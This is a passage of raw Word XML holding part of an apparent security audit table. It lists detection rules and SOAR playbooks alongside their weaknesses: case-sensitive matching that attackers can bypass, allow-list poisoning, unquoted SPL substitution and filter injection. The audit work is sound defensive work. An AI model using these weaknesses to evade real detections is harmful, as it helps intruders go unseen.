            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detect_spike_in_s3_bucket_deletion.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>New-IP and spike detections write their own allow-list from attacker-influenced events (self-poisoning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/cloud/detect_s3_access_from_a_new_ip.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>New-IP and spike detections write their own allow-list from attacker-influenced events (self-poisoning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/cloud/gsuite_outbound_email_with_attachment_to_external_domain.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/endpoint/crowdstrike_privilege_escalation_for_non_admin_user.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Case-sensitive match()/LIKE on attacker-controlled fields allows trivial bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/endpoint/first_time_seen_running_windows_service.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Previously-seen baselines and their consumers form an allow-list poisoning path (30 files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/endpoint/potential_password_in_username.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-chosen username substituted unquoted into an inner SPL search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/endpoint/rundll_loading_dll_by_ordinal.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Case-sensitive match()/LIKE on attacker-controlled fields allows trivial bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/endpoint/windows_admin_permission_discovery.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Case-sensitive match()/LIKE on attacker-controlled fields allows trivial bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/web/crushftp_authentication_bypass_exploitation.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Case-sensitive match()/LIKE on attacker-controlled fields allows trivial bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/find_related_containers.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>gsuite_drive_share_in_external_email.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>gsuite_email_suspicious_subject_with_attachment.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>gsuite_email_with_known_abuse_web_service_link.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>gsuite_suspicious_shared_file_name.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/indicator_get_by_tag.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01,CF-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/indicator_tag.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01,CF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
